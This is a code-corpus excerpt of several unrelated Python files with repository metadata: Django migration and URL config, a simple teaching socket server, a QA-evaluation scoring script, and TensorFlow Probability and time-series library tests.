        print "Record created successfully, id = %s" % device_stack_id
        status = 'Record created successfully, id = %s' % device_stack_id
        device_stacks_part_id = device_stacks_part_id+1
        #else:
        #result.remove(device_stacks_part_id)
        #print "Record already exists, id = %s" % result[0]
        #status = "Record already exists, id = %s" % result[0]
        #conn.execute("DELETE FROM device_stack_parts WHERE id = ?", (device_stacks_part_id,));
        #result[0] = device_stacks_part_id
    #this is a mess
    conn.commit()
    #conn.close()
    return device_stack_id, status
|
[
"833625@swansea.ac.uk"
] |
833625@swansea.ac.uk
|
55e6bf144a154ad0a793bd5e4c8003ba57282762
|
a6856778fcd6c7525d099a370a2d8929bda56c84
|
/rango/migrations/0002_auto_20180121_1803.py
|
e0b2261167de62a13e8cf571375c23bf07c12d37
|
[] |
no_license
|
marto12345/tango_with_django_project
|
45388cd54f8755aa1d90564ed7831138ac892955
|
3af5a71b8872d5cf2b9f43540b63446cfa70383b
|
refs/heads/master
| 2021-09-06T16:05:56.827815
| 2018-02-08T10:36:13
| 2018-02-08T10:36:13
| 117,220,804
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 724
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-01-21 18:03
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('rango', '0001_initial'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='category',
            options={'verbose_name_plural': 'Categories'},
        ),
        migrations.AddField(
            model_name='category',
            name='likes',
            field=models.IntegerField(default=0),
        ),
        migrations.AddField(
            model_name='category',
            name='views',
            field=models.IntegerField(default=0),
        ),
    ]
|
[
"2247164D@student.gla.ac.uk"
] |
2247164D@student.gla.ac.uk
|
af3775190e643c596ee52288df6168ac27e96704
|
16da574a10f7cb19200cc076400eb0af15ce0927
|
/soulware-backend/web_proj/urls.py
|
b34ac59c7e3163483c6697a76b3bc7123720e669
|
[] |
no_license
|
shg9411/soulware
|
f08128a91e84adb42169101a84ce2d41faed4e7e
|
4e0ce35dd3cbcda00138f7db49d6949e699da562
|
refs/heads/main
| 2023-04-28T04:54:05.957589
| 2021-05-10T06:05:53
| 2021-05-10T06:05:53
| 348,669,106
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,033
|
py
|
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
from rest_framework import permissions

schema_view = get_schema_view(
    openapi.Info(
        title="API",
        default_version='v1',
        description="API documentation",
        contact=openapi.Contact(email="shg9411@naver.com"),
        license=openapi.License(name="No License"),
    ),
    public=True,
    permission_classes=(permissions.AllowAny,),
)

urlpatterns = [
    # path('admin/', admin.site.urls),
    path('api/accounts/', include('accounts.urls')),
    path('api/boards/', include('boards.urls')),
    path('api/blogs/', include('blogs.urls'))
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)

if settings.DEBUG:
    urlpatterns += [
        path('', schema_view.with_ui('swagger',
                                     cache_timeout=0), name='schema-swagger-ui'),
    ]
|
[
"shg9411@naver.com"
] |
shg9411@naver.com
|
8843f08796119d39abcfba1b77cf133fba75e43f
|
31ee95824818f899707f046c71d676bae0416a55
|
/class6-sockets/3c.betterserver.py
|
bf565ff7729a267c450909b07799ce466bf3e580
|
[] |
no_license
|
cloudsecuritylabs/pythonclassaug2021
|
25af51df61ca804656001821f945dcfa1cb23502
|
c1aa6a9b0b602b1be581c06c695a66ca3741d480
|
refs/heads/master
| 2023-08-24T13:19:08.350995
| 2021-10-11T02:50:24
| 2021-10-11T02:50:24
| 400,352,574
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 421
|
py
|
import socket

try:
    mysocket = socket.socket()
    mysocket.bind(('0.0.0.0', 1339))
    mysocket.listen(1)
    c, addr = mysocket.accept()
    buffer = 5
    data = ""
    while True:
        packet = c.recv(buffer)
        parsed = packet.decode()
        data += parsed
        if len(packet) < buffer:
            print(f'full data -> {data}')
            break
except:
    print("done")
|
[
"basu.ankan@gmail.com"
] |
basu.ankan@gmail.com
|
f7c5355d1cc1c692102fd43f2b4ead3cb9c6aa46
|
a48b6a7de1271d60106e2c372039867906ff209a
|
/finished/rpninfix_test.py
|
c11a6227ba91ec2861282c0b0039266079694fdb
|
[
"MIT"
] |
permissive
|
kpatel20538/Rosetta-Code-Python-Tasks
|
f96edc50ffd5cad1bdd1e7e1ae56cb801ca3fd2b
|
0e0a7af89fa0dd3a534c6edf83b99e3e8a41b19a
|
refs/heads/master
| 2021-01-12T00:08:02.022550
| 2017-01-16T02:13:20
| 2017-01-16T02:13:20
| 78,676,035
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 757
|
py
|
import tasks.rpninfix
import unittest
import logging


class TestRpnInfix(unittest.TestCase):
    def setUp(self):
        """ Test Case Enviroment """
        logging.basicConfig(filename="./logs/rpninfix_test.log", level=logging.DEBUG)
        logging.info('TestRpnInfix initialized')

    def test_left_assoc(self):
        """ Testing Left Associativity """
        logging.info("test_left_assoc()")
        rpn = "3 4 5 - *"
        infix = tasks.rpninfix.rpn_to_infix(rpn)
        self.assertEqual(infix, "3 * ( 4 - 5 )")

    def test_right_assoc(self):
        """ Testing Right Associativity """
        logging.info("test_right_assoc()")
        rpn = "5 6 ^ 7 ^"
        infix = tasks.rpninfix.rpn_to_infix(rpn)
        self.assertEqual(infix, "( 5 ^ 6 ) ^ 7")


if __name__ == '__main__':
    unittest.main()
|
[
"kpatel20538@gmail.com"
] |
kpatel20538@gmail.com
|
5960b56a73a75ad709c224e1284238096c68a1a7
|
37cc94b8c79fda394068b938037085eb3198024a
|
/script.py
|
f272cbb625397da886760d98b0934385c6dd03de
|
[
"BSD-2-Clause"
] |
permissive
|
kingsea0-0/GrafNet
|
c98922d1f4239f259c8a1ac28ec955c5c539e825
|
32165bfccf5afb171c4b8362796f825e16392e30
|
refs/heads/master
| 2022-04-18T07:28:43.813180
| 2020-04-23T07:48:30
| 2020-04-23T07:48:30
| 256,982,056
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,673
|
py
|
import sys
import json
import nltk
from tqdm import tqdm
from collections import Counter
# from itertools import zip


def combine_dist(dist1, dist2, w1):
    ensemble_dist = dist2.copy()
    for gid, prob in dist1.items():
        if gid in ensemble_dist:
            ensemble_dist[gid] = (1 - w1) * ensemble_dist[gid] + w1 * prob
        else:
            ensemble_dist[gid] = prob
    return ensemble_dist


def get_one_f1(entities, dist, eps, answers):
    correct = 0.0
    total = 0.0
    best_entity = -1
    max_prob = 0.0
    preds = []
    for entity in entities:
        if dist[entity] > max_prob:
            max_prob = dist[entity]
            best_entity = entity
        if dist[entity] > eps:
            preds.append(entity)
    return cal_eval_metric(best_entity, preds, answers)


def cal_eval_metric(best_pred, preds, answers):
    correct, total = 0.0, 0.0
    for entity in preds:
        if entity in answers:
            correct += 1
        total += 1
    if len(answers) == 0:
        if total == 0:
            return 1.0, 1.0, 1.0, 1.0  # precision, recall, f1, hits
        else:
            return 0.0, 1.0, 0.0, 1.0  # precision, recall, f1, hits
    else:
        hits = float(best_pred in answers)
        if total == 0:
            return 1.0, 0.0, 0.0, hits  # precision, recall, f1, hits
        else:
            precision, recall = correct / total, correct / len(answers)
            f1 = 2.0 / (1.0 / precision + 1.0 / recall) if precision != 0 and recall != 0 else 0.0
            return precision, recall, f1, hits


def compare_pr(kb_pred_file, doc_pred_file, hybrid_pred_file, w_kb, eps_doc, eps_kb, eps_ensemble, eps_hybrid, eps_ensemble_all):
    doc_only_recall, doc_only_precision, doc_only_f1, doc_only_hits = [], [], [], []
    kb_only_recall, kb_only_precision, kb_only_f1, kb_only_hits = [], [], [], []
    ensemble_recall, ensemble_precision, ensemble_f1, ensemble_hits = [], [], [], []
    hybrid_recall, hybrid_precision, hybrid_f1, hybrid_hits = [], [], [], []
    ensemble_all_recall, ensemble_all_precision, ensemble_all_f1, ensemble_all_hits = [], [], [], []
    total_not_answerable = 0.0
    with open(kb_pred_file, 'rb') as f_kb, open(doc_pred_file, 'rb') as f_doc, open(hybrid_pred_file, 'rb') as f_hybrid:
        line_id = 0
        for line_kb, line_doc, line_hybrid in tqdm(zip(f_kb, f_doc, f_hybrid)):
            line_id += 1
            line_kb = json.loads(line_kb)
            line_doc = json.loads(line_doc)
            line_hybrid = json.loads(line_hybrid)
            assert line_kb['answers'] == line_doc['answers'] == line_hybrid['answers']
            answers = set([unicode(answer) for answer in line_kb['answers']])
            # total_not_answerable += (len(answers) == 0)
            # assert len(answers) > 0
            dist_kb = line_kb['dist']
            dist_doc = line_doc['dist']
            dist_hybrid = line_hybrid['dist']
            dist_ensemble = combine_dist(dist_kb, dist_doc, w_kb)
            dist_ensemble_all = combine_dist(dist_ensemble, dist_hybrid, w1=0.3)
            kb_entities = set(dist_kb.keys())
            doc_entities = set(dist_doc.keys())
            either_entities = kb_entities | doc_entities
            assert either_entities == set(dist_hybrid.keys())
            p, r, f1, hits = get_one_f1(doc_entities, dist_doc, eps_doc, answers)
            doc_only_precision.append(p)
            doc_only_recall.append(r)
            doc_only_f1.append(f1)
            doc_only_hits.append(hits)
            p, r, f1, hits = get_one_f1(kb_entities, dist_kb, eps_kb, answers)
            kb_only_precision.append(p)
            kb_only_recall.append(r)
            kb_only_f1.append(f1)
            kb_only_hits.append(hits)
            p, r, f1, hits = get_one_f1(either_entities, dist_ensemble, eps_ensemble, answers)
            ensemble_precision.append(p)
            ensemble_recall.append(r)
            ensemble_f1.append(f1)
            ensemble_hits.append(hits)
            p, r, f1, hits = get_one_f1(either_entities, dist_hybrid, eps_hybrid, answers)
            hybrid_precision.append(p)
            hybrid_recall.append(r)
            hybrid_f1.append(f1)
            hybrid_hits.append(hits)
            p, r, f1, hits = get_one_f1(either_entities, dist_ensemble_all, eps_ensemble_all, answers)
            ensemble_all_precision.append(p)
            ensemble_all_recall.append(r)
            ensemble_all_f1.append(f1)
            ensemble_all_hits.append(hits)
    print('text only setting:')
    print('hits: ', sum(doc_only_hits) / len(doc_only_hits))
    print('precision: ', sum(doc_only_precision) / len(doc_only_precision))
    print('recall: ', sum(doc_only_recall) / len(doc_only_recall))
    print('f1: ', sum(doc_only_f1) / len(doc_only_f1))
    print('\n')
    print('kb only setting:')
    print('hits: ', sum(kb_only_hits) / len(kb_only_hits))
    print('precision: ', sum(kb_only_precision) / len(kb_only_precision))
    print('recall: ', sum(kb_only_recall) / len(kb_only_recall))
    print('f1: ', sum(kb_only_f1) / len(kb_only_f1))
    print('\n')
    print('late fusion:')
    print('hits: ', sum(ensemble_hits) / len(ensemble_hits))
    print('precision: ', sum(ensemble_precision) / len(ensemble_precision))
    print('recall: ', sum(ensemble_recall) / len(ensemble_recall))
    print('f1: ', sum(ensemble_f1) / len(ensemble_f1))
    print('\n')
    print('early fusion:')
    print('hits: ', sum(hybrid_hits) / len(hybrid_hits))
    print('precision: ', sum(hybrid_precision) / len(hybrid_precision))
    print('recall: ', sum(hybrid_recall) / len(hybrid_recall))
    print('f1: ', sum(hybrid_f1) / len(hybrid_f1))
    print('\n')
    print('early & late fusion:')
    print('hits: ', sum(ensemble_all_hits) / len(ensemble_all_hits))
    print('precision: ', sum(ensemble_all_precision) / len(ensemble_all_precision))
    print('recall: ', sum(ensemble_all_recall) / len(ensemble_all_recall))
    print('f1: ', sum(ensemble_all_f1) / len(ensemble_all_f1))
    print('\n')


if __name__ == "__main__":
    dataset = sys.argv[1]
    pred_kb_file = sys.argv[2]
    pred_doc_file = sys.argv[3]
    pred_hybrid_file = sys.argv[4]
    if dataset == "wikimovie":
        w_kb = 0.9
        eps_doc, eps_kb, eps_ensemble, eps_hybrid, eps_ensemble_all = 0.5, 0.55, 0.6, 0.5, 0.55
    elif dataset == "webqsp":
        w_kb = 1.0
        eps_doc, eps_kb, eps_ensemble, eps_hybrid, eps_ensemble_all = 0.15, 0.2, 0.2, 0.2, 0.3
    else:
        assert False, "dataset not recognized"
    compare_pr(pred_kb_file, pred_doc_file, pred_hybrid_file, w_kb, eps_doc, eps_kb, eps_ensemble, eps_hybrid, eps_ensemble_all)
|
[
"741222996@qq.com"
] |
741222996@qq.com
|
dca56aedfa3ad1aebbac730c6682f2dfc35d9fb1
|
971e0efcc68b8f7cfb1040c38008426f7bcf9d2e
|
/tests/artificial/transf_Integration/trend_PolyTrend/cycle_12/ar_/test_artificial_128_Integration_PolyTrend_12__100.py
|
b4f25714f1ffe6ea1d2ffda7b332a68fb1668f32
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
antoinecarme/pyaf
|
a105d172c2e7544f8d580d75f28b751351dd83b6
|
b12db77cb3fa9292e774b2b33db8ce732647c35e
|
refs/heads/master
| 2023-09-01T09:30:59.967219
| 2023-07-28T20:15:53
| 2023-07-28T20:15:53
| 70,790,978
| 457
| 77
|
BSD-3-Clause
| 2023-03-08T21:45:40
| 2016-10-13T09:30:30
|
Python
|
UTF-8
|
Python
| false
| false
| 268
|
py
|
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "PolyTrend", cycle_length = 12, transform = "Integration", sigma = 0.0, exog_count = 100, ar_order = 0);
|
[
"antoine.carme@laposte.net"
] |
antoine.carme@laposte.net
|
60420a475a2f7366d5990acf32aebbc4b9c41da5
|
ba6924d75c47ec173749a7fe2fd54a195f542dc3
|
/tensorflow_probability/python/distributions/joint_distribution_coroutine_test.py
|
87175609d56f614fe9ae2689f49eb4993f6bccf1
|
[
"Apache-2.0"
] |
permissive
|
AngelBerihuete/probability
|
d8e27f7a78fb558f22ca8115ba042d49f335415b
|
8bdbf1c0b0f801edaf342f4ffc9caf1cfd6f1103
|
refs/heads/master
| 2020-06-09T13:52:01.275044
| 2019-06-22T00:06:10
| 2019-06-22T00:07:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,970
|
py
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for the JointDistributionCoroutine."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
# Dependency imports
import numpy as np
import tensorflow.compat.v2 as tf
import tensorflow_probability as tfp
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import
tfd = tfp.distributions
Root = tfd.JointDistributionCoroutine.Root
@test_util.run_all_in_graph_and_eager_modes
class JointDistributionCoroutineTest(tf.test.TestCase):
def test_batch_and_event_shape_no_plate(self):
# The joint distribution specified below corresponds to this
# graphical model
#
# (a)-->--(b)
# \ |
# \ v
# `->-(c)
def dist():
a = yield Root(tfd.Bernoulli(probs=0.5,
dtype=tf.float32))
b = yield tfd.Bernoulli(probs=0.25 + 0.5*a,
dtype=tf.float32)
yield tfd.Normal(loc=a, scale=1. + b)
joint = tfd.JointDistributionCoroutine(dist, validate_args=True)
# Neither `event_shape` nor `batch_shape` can be determined
# without the underlying distributions being cached.
self.assertAllEqual(joint.event_shape, None)
self.assertAllEqual(joint.batch_shape, None)
ds, _ = joint.sample_distributions()
self.assertLen(ds, 3)
self.assertIsInstance(ds[0], tfd.Bernoulli)
self.assertIsInstance(ds[1], tfd.Bernoulli)
self.assertIsInstance(ds[2], tfd.Normal)
is_event_scalar = joint.is_scalar_event()
self.assertAllEqual(is_event_scalar[0], True)
self.assertAllEqual(is_event_scalar[1], True)
self.assertAllEqual(is_event_scalar[2], True)
event_shape = joint.event_shape_tensor()
self.assertAllEqual(event_shape[0], [])
self.assertAllEqual(event_shape[1], [])
self.assertAllEqual(event_shape[2], [])
self.assertAllEqual(joint.event_shape, [[], [], []])
is_batch_scalar = joint.is_scalar_batch()
self.assertAllEqual(is_batch_scalar[0], True)
self.assertAllEqual(is_batch_scalar[1], True)
self.assertAllEqual(is_batch_scalar[2], True)
batch_shape = joint.batch_shape_tensor()
self.assertAllEqual(batch_shape[0], [])
self.assertAllEqual(batch_shape[1], [])
self.assertAllEqual(batch_shape[2], [])
self.assertAllEqual(joint.batch_shape, [[], [], []])
def test_batch_and_event_shape_with_plate(self):
# The joint distribution specified below corresponds to this
# graphical model
#
# +-----------+
# (g)--+-->--(loc) |
# | | |
# | v |
# (df)--+-->---(x) |
# +--------20-+
def dist():
g = yield Root(tfd.Gamma(2, 2))
df = yield Root(tfd.Exponential(1.))
loc = yield tfd.Sample(tfd.Normal(0, g), 20)
yield tfd.Independent(tfd.StudentT(tf.expand_dims(df, -1), loc, 1), 1)
joint = tfd.JointDistributionCoroutine(dist, validate_args=True)
# Neither `event_shape` nor `batch_shape` can be determined
# without the underlying distributions being cached.
self.assertAllEqual(joint.event_shape, None)
self.assertAllEqual(joint.batch_shape, None)
ds, _ = joint.sample_distributions()
self.assertLen(ds, 4)
self.assertIsInstance(ds[0], tfd.Gamma)
self.assertIsInstance(ds[1], tfd.Exponential)
self.assertIsInstance(ds[2], tfd.Sample)
self.assertIsInstance(ds[3], tfd.Independent)
is_scalar = joint.is_scalar_event()
self.assertAllEqual(is_scalar[0], True)
self.assertAllEqual(is_scalar[1], True)
self.assertAllEqual(is_scalar[2], False)
self.assertAllEqual(is_scalar[3], False)
event_shape = joint.event_shape_tensor()
self.assertAllEqual(event_shape[0], [])
self.assertAllEqual(event_shape[1], [])
self.assertAllEqual(event_shape[2], [20])
self.assertAllEqual(event_shape[3], [20])
self.assertAllEqual(joint.event_shape, [[], [], [20], [20]])
is_batch = joint.is_scalar_batch()
self.assertAllEqual(is_batch[0], True)
self.assertAllEqual(is_batch[1], True)
self.assertAllEqual(is_batch[2], True)
self.assertAllEqual(is_batch[3], True)
batch_shape = joint.batch_shape_tensor()
self.assertAllEqual(batch_shape[0], [])
self.assertAllEqual(batch_shape[1], [])
self.assertAllEqual(batch_shape[2], [])
self.assertAllEqual(batch_shape[3], [])
self.assertAllEqual(joint.batch_shape, [[], [], [], []])
def test_sample_shape_no_plate(self):
# The joint distribution specified below corresponds to this
# graphical model
#
# (a)-->--(b)
# \ |
# \ v
# `->-(c)
def dist():
a = yield Root(tfd.Bernoulli(probs=0.5,
dtype=tf.float32))
b = yield tfd.Bernoulli(probs=0.25 + 0.5*a,
dtype=tf.float32)
yield tfd.Normal(loc=a, scale=1. + b)
joint = tfd.JointDistributionCoroutine(dist, validate_args=True)
z = joint.sample()
self.assertAllEqual(tf.shape(input=z[0]), [])
self.assertAllEqual(tf.shape(input=z[1]), [])
self.assertAllEqual(tf.shape(input=z[2]), [])
z = joint.sample(2)
self.assertAllEqual(tf.shape(input=z[0]), [2])
self.assertAllEqual(tf.shape(input=z[1]), [2])
self.assertAllEqual(tf.shape(input=z[2]), [2])
z = joint.sample([3, 2])
self.assertAllEqual(tf.shape(input=z[0]), [3, 2])
self.assertAllEqual(tf.shape(input=z[1]), [3, 2])
self.assertAllEqual(tf.shape(input=z[2]), [3, 2])
def test_sample_shape_with_plate(self):
# The joint distribution specified below corresponds to this
# graphical model
#
# +-----------+
# (g)--+-->--(loc) |
# | | |
# | v |
# (df)--+-->---(x) |
# +--------20-+
def dist():
g = yield Root(tfd.Gamma(2, 2))
df = yield Root(tfd.Exponential(1.))
loc = yield tfd.Sample(tfd.Normal(0, g), 20)
yield tfd.Independent(tfd.StudentT(tf.expand_dims(df, -1), loc, 1), 1)
joint = tfd.JointDistributionCoroutine(dist, validate_args=True)
z = joint.sample()
self.assertAllEqual(tf.shape(input=z[0]), [])
self.assertAllEqual(tf.shape(input=z[1]), [])
self.assertAllEqual(tf.shape(input=z[2]), [20])
self.assertAllEqual(tf.shape(input=z[3]), [20])
z = joint.sample(2)
self.assertAllEqual(tf.shape(input=z[0]), [2])
self.assertAllEqual(tf.shape(input=z[1]), [2])
self.assertAllEqual(tf.shape(input=z[2]), [2, 20])
self.assertAllEqual(tf.shape(input=z[3]), [2, 20])
z = joint.sample([3, 2])
self.assertAllEqual(tf.shape(input=z[0]), [3, 2])
self.assertAllEqual(tf.shape(input=z[1]), [3, 2])
self.assertAllEqual(tf.shape(input=z[2]), [3, 2, 20])
self.assertAllEqual(tf.shape(input=z[3]), [3, 2, 20])
def test_log_prob_no_plate(self):
# The joint distribution specified below corresponds to this
# graphical model
#
# (a)-->--(b)
# \ |
# \ v
# `->-(c)
def dist():
a = yield Root(tfd.Bernoulli(probs=0.5,
dtype=tf.float32))
b = yield tfd.Bernoulli(probs=0.25 + 0.5*a,
dtype=tf.float32)
yield tfd.Normal(loc=a, scale=1. + b)
joint = tfd.JointDistributionCoroutine(dist, validate_args=True)
z = joint.sample()
log_prob = joint.log_prob(z)
a, b, c = z # pylint: disable=unbalanced-tuple-unpacking
expected_log_prob = (
np.log(0.5) +
tf.math.log(b * (0.25 + 0.5 * a) +
(1 - b) * (0.75 -0.5 * a)) +
-0.5 * ((c - a) / (1. + b)) ** 2 -
0.5 * np.log(2. * np.pi) -
tf.math.log((1. + b)))
self.assertAllClose(*self.evaluate([log_prob, expected_log_prob]))
def test_log_prob_with_plate(self):
# The joint distribution specified below corresponds to this
# graphical model
#
# +-----------+
# | |
# (a)--+--(b)->(c) |
# | |
# +---------2-+
def dist():
a = yield Root(tfd.Bernoulli(probs=0.5,
dtype=tf.float32))
b = yield tfd.Sample(tfd.Bernoulli(probs=0.25 + 0.5*a,
dtype=tf.float32), 2)
yield tfd.Independent(tfd.Normal(loc=a, scale=1. + b), 1)
joint = tfd.JointDistributionCoroutine(dist, validate_args=True)
z = joint.sample()
a, b, c = z # pylint: disable=unbalanced-tuple-unpacking
log_prob = joint.log_prob(z)
expected_log_prob = (
np.log(0.5) +
tf.reduce_sum(input_tensor=tf.math.log(b * (0.25 + 0.5 * a) +
(1 - b) * (0.75 -0.5 * a))) +
tf.reduce_sum(input_tensor=-0.5 * ((c - a) / (1. + b)) ** 2 -
0.5 * np.log(2. * np.pi) -
tf.math.log((1. + b))))
self.assertAllClose(*self.evaluate([log_prob, expected_log_prob]))
def test_log_prob_multiple_samples(self):
# The joint distribution specified below corresponds to this
# graphical model
#
# (a)-->--(b)
# \ |
# \ v
# `->-(c)
def dist():
a = yield Root(tfd.Bernoulli(probs=0.5,
dtype=tf.float32))
b = yield tfd.Bernoulli(probs=0.25 + 0.5*a,
dtype=tf.float32)
yield tfd.Normal(loc=a, scale=1. + b)
joint = tfd.JointDistributionCoroutine(dist, validate_args=True)
z = joint.sample(4)
log_prob = joint.log_prob(z)
a, b, c = z # pylint: disable=unbalanced-tuple-unpacking
expected_log_prob = (
np.log(0.5) +
tf.math.log(b * (0.25 + 0.5 * a) +
(1 - b) * (0.75 -0.5 * a)) +
-0.5 * ((c - a) / (1. + b)) ** 2 -
0.5 * np.log(2. * np.pi) -
tf.math.log((1. + b)))
self.assertAllClose(*self.evaluate([log_prob, expected_log_prob]))
def test_prob_multiple_samples(self):
# The joint distribution specified below corresponds to this
# graphical model
#
# (a)-->--(b)
# \ |
# \ v
# `->-(c)
def dist():
a = yield Root(tfd.Bernoulli(probs=0.5,
dtype=tf.float32))
b = yield tfd.Bernoulli(probs=0.25 + 0.5*a,
dtype=tf.float32)
yield tfd.Normal(loc=a, scale=1. + b)
joint = tfd.JointDistributionCoroutine(dist, validate_args=True)
z = joint.sample(4)
prob = joint.prob(z)
a, b, c = z # pylint: disable=unbalanced-tuple-unpacking
expected_prob = tf.exp(
np.log(0.5) +
tf.math.log(b * (0.25 + 0.5 * a) +
(1 - b) * (0.75 -0.5 * a)) +
-0.5 * ((c - a) / (1. + b)) ** 2 -
0.5 * np.log(2. * np.pi) -
tf.math.log((1. + b)))
self.assertAllClose(*self.evaluate([prob, expected_prob]))
def test_log_prob_multiple_roots(self):
# The joint distribution specified below corresponds to this
# graphical model
#
# +-----------+
# (a)--+-->---(b) |
# | | |
# | v |
# (c)--+-->---(d) |
# +---------2-+
def dist():
a = yield Root(tfd.Exponential(1.))
b = yield tfd.Sample(tfd.Normal(a, 1.), 20)
c = yield Root(tfd.Exponential(1.))
yield tfd.Independent(tfd.Normal(b, tf.expand_dims(c, -1)), 1)
joint = tfd.JointDistributionCoroutine(dist, validate_args=True)
z = joint.sample()
a, b, c, d = z # pylint: disable=unbalanced-tuple-unpacking
expected_log_prob = (- a +
tf.reduce_sum(
input_tensor=
-0.5 * (b - a) ** 2 +
-0.5 * np.log(2. * np.pi),
axis=-1) -
c +
tf.reduce_sum(
input_tensor=
-0.5 * (d - b) ** 2 / c ** 2 +
-0.5 * tf.math.log(2. * np.pi * c ** 2),
axis=-1))
log_prob = joint.log_prob(z)
self.assertAllClose(*self.evaluate([log_prob, expected_log_prob]))
def test_log_prob_multiple_roots_and_samples(self):
# The joint distribution specified below corresponds to this
# graphical model
#
# +-----------+
# (a)--+-->---(b) |
# | | |
# | v |
# (c)--+-->---(d) |
# +---------2-+
def dist():
a = yield Root(tfd.Exponential(1.))
b = yield tfd.Sample(tfd.Normal(a, 1.), 20)
c = yield Root(tfd.Exponential(1.))
yield tfd.Independent(tfd.Normal(b, tf.expand_dims(c, -1)), 1)
joint = tfd.JointDistributionCoroutine(dist, validate_args=True)
z = joint.sample([3, 5])
a, b, c, d = z # pylint: disable=unbalanced-tuple-unpacking
expanded_c = tf.expand_dims(c, -1)
expected_log_prob = (
- a +
tf.reduce_sum(
input_tensor=
-0.5 * (b - tf.expand_dims(a, -1)) ** 2 +
-0.5 * np.log(2. * np.pi),
axis=-1) -
c +
tf.reduce_sum(
input_tensor=
-0.5 * (d - b) ** 2 / expanded_c ** 2 +
-0.5 * tf.math.log(2. * np.pi * expanded_c ** 2),
axis=-1))
log_prob = joint.log_prob(z)
self.assertAllClose(*self.evaluate([log_prob, expected_log_prob]))
def test_sample_dtype_structures_output(self):
def noncentered_horseshoe_prior(num_features):
scale_variance = yield Root(
tfd.InverseGamma(0.5, 0.5))
scale_noncentered = yield Root(
tfd.Sample(tfd.HalfNormal(1.), num_features))
scale = scale_noncentered * scale_variance[..., None]**0.5
weights_noncentered = yield Root(
tfd.Sample(tfd.Normal(0., 1.), num_features))
yield tfd.Independent(tfd.Deterministic(weights_noncentered * scale),
reinterpreted_batch_ndims=1)
# Currently sample_dtype is only used for `tf.nest.pack_structure_as`. In
# the future we may use it for error checking and/or casting.
sample_dtype = collections.namedtuple('Model', [
'scale_variance',
'scale_noncentered',
'weights_noncentered',
'weights',
])(*([None]*4))
joint = tfd.JointDistributionCoroutine(
lambda: noncentered_horseshoe_prior(4),
sample_dtype=sample_dtype,
validate_args=True)
self.assertAllEqual(sorted(sample_dtype._fields),
sorted(joint.sample()._fields))
ds, xs = joint.sample_distributions([2, 3])
tf.nest.assert_same_structure(sample_dtype, ds)
tf.nest.assert_same_structure(sample_dtype, xs)
self.assertEqual([3, 4], joint.log_prob(joint.sample([3, 4])).shape)
def test_repr_with_custom_sample_dtype(self):
def model():
s = yield tfd.JointDistributionCoroutine.Root(
tfd.Sample(tfd.InverseGamma(2, 2), 100))
yield tfd.Independent(tfd.Normal(0, s), 1)
sd = collections.namedtuple('Model', ['s', 'w'])(None, None)
m = tfd.JointDistributionCoroutine(model, sample_dtype=sd)
self.assertEqual(
('tfp.distributions.JointDistributionCoroutine('
'"JointDistributionCoroutine",'
' dtype=Model(s=?, w=?))'),
str(m))
self.assertEqual(
('<tfp.distributions.JointDistributionCoroutine'
' \'JointDistributionCoroutine\''
' batch_shape=?'
' event_shape=?'
' dtype=Model(s=?, w=?)>'),
repr(m))
m.sample()
self.assertEqual(
('tfp.distributions.JointDistributionCoroutine('
'"JointDistributionCoroutine",'
' batch_shape=Model(s=[], w=[]),'
' event_shape=Model(s=[100], w=[100]),'
' dtype=Model(s=float32, w=float32))'),
str(m))
self.assertEqual(
('<tfp.distributions.JointDistributionCoroutine'
' \'JointDistributionCoroutine\''
' batch_shape=Model(s=[], w=[])'
' event_shape=Model(s=[100], w=[100])'
' dtype=Model(s=float32, w=float32)>'),
repr(m))
if __name__ == '__main__':
tf.test.main()
|
[
"gardener@tensorflow.org"
] |
gardener@tensorflow.org
|
4262ca17e4f906cb8056db58604ac8cce6e59b9a
|
23ba854b3b6cb457c8c01793e24f15d411650281
|
/monk/tf_keras_1/finetune/level_4_evaluation_base.py
|
34b6beb1c1d5cd6ff1fdf4aa1d96d4abf7912acf
|
[
"Apache-2.0"
] |
permissive
|
shaunstanislauslau/monk_v1
|
a506a8cb2e45f3d04734bfab01db09eb3d804771
|
01905b911f1757adef9d7366a704b2a5289e1095
|
refs/heads/master
| 2023-05-11T08:16:39.442925
| 2020-03-03T07:45:06
| 2020-03-03T07:45:06
| 244,685,539
| 0
| 0
|
Apache-2.0
| 2023-05-09T19:02:15
| 2020-03-03T16:25:46
| null |
UTF-8
|
Python
| false
| false
| 6,543
|
py
|
from tf_keras_1.finetune.imports import *
from system.imports import *
from tf_keras_1.finetune.level_3_training_base import finetune_training
class finetune_evaluation(finetune_training):
@accepts("self", verbose=int, post_trace=True)
@TraceFunction(trace_args=True, trace_rv=True)
def __init__(self, verbose=1):
super().__init__(verbose=verbose);
###############################################################################################################################################
@accepts("self", post_trace=True)
@TraceFunction(trace_args=True, trace_rv=True)
def set_evaluation_final(self):
self.custom_print("Testing");
self.system_dict["testing"]["status"] = False;
if(self.system_dict["training"]["settings"]["display_progress_realtime"] and self.system_dict["verbose"]):
verbose=1;
else:
verbose=0;
running_corrects = 0
class_dict = {};
